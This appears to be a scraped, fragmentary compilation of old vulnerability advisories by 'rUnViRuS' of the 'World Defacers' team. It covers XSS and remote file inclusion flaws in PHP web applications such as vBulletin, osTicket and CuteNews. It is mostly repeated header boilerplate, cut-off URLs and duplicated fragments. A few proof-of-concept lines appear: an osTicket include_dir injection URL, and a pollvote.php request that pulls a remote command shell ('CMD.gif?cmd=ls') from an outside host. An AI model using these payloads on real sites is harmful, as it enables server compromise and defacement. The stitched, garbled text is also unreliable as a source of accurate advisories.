.: XSS
+ Risk ..: high
+ Found by ..: Ahmed atif abdou [ OCERT Ambassador Program - Oman
National CERT ]
+ Facebook .: https://www.facebook.com/runvirus
+ Contact ...: stormhacker[at]hotmail[.]com
.: XSS
+ Risk ..: Low
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...: stormhacker[at]hotmail[.]com
+ Vulnerable Script..: showthread.php
+
New Include Redirect Bug
.: XSS
+ Risk ..: Low
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...: stormhacker[at]hotmail[.]com
+
+
New Include Redirect Bug XSS All vBulletin v 3.x.x
advisory .: http://www.sec-area.com/
+ Contact ...: stormhacker[at]hotmail[.]com
+
+
+ PoC:
+
+ Database error SQL
+
// do not limit
+ Risk ..: high (LoCal File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
+
+
+ PoC:
+
+http
.: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.phpwebscripts.com/
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
# TOPSTORY BASIC Version 1.0 = Remote File Include Vulnerability
# Script.. :TOPSTORY
# Discovered By : rUnViRuS
# Class.. : Remote
# Original Advisory : http://sec-area.com
#
# file :- index.php
# bug Code :- include($tst[headerfile]);
script:- osTicket Open Source Support Ticket System
site:- http://www.osticket.com
exploit by runvirus
http://www.host/path/include/open_form.php?include_dir=
welcome in www.sec-area.com
://www.net2ftp.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
...: http://www.phpselect.com/
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
[W]orld [D]efacers Team
Summary
eVuln ID: WD26
Vendor: Deparcq Pieter project
Dook:- Copyright © 2004 by Deparcq Pieter Dries Van Thourhout
Software: Live Customer Support Solution :- http://www.davidsfonds-roeselare.be/
Class: Remote
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD23
Vendor: SimpleBoard Mambo Component 1.1.0
Vendor's Web Site: mamboxchange.com/projects/simpleboard
Class: Remote
PoC/Exploit: Available
Solution: Not Available
[W]orld [D]efacers Team
Summary
eVuln ID: WD23
Vendor: phpopenchat-3.0.*
Vendor's Web Site: http://phpopenchat.org
Class: Remote
PoC/Exploit: Available
Solution: Not Available
Discovered by: rUnViRuS ( wdzone.net worlddefacers.de )
Welcome people In World Defacers Team
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD22
Vendor: CuteNews 1.3.*
Vendor's Web Site: http://cutephp.com/
Software: Live Customer Support Solution :-
Welcome people In World Defacers Team
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD21
Vendor: MKPortal 1.0.1 Final
Vendor's Web Site: wttp://www.kaimanweb.net
Software: Live Customer Support Solution :-
Hey
look this
http://www.securityfocus.com/archive/1/428976
i found this bugs in Mar 27 2006
http://www.worlddefacers.de/Public/WD-TMPLH.txt
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD10
Vendor: SimpleBBS
Vendor's Web Site: www.simplemedia.org
Software: SimpleBBS Forums
Sowtware's Web Site: www.simplemedia.org
Versions: v1.1 v 1.0.*
Class: Remote
PoC/Exploit:
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD00
Vendor: phplivehelper
Vendor's Web Site: www.phplivehelper.com
Software: Live Customer Support Solution
Sowtware's Web Site:
Summary
Software: bttlxeForum
Sowtware's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus
(worlddefacers.de securitycentra.com)
Title: PollVote Remote File Inclusion
http://www.worlddefacers.net
Vulnerability Discovery: rUnViRuS
--
exploit :-
http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?cmd=ls
34 matches
Mail list logo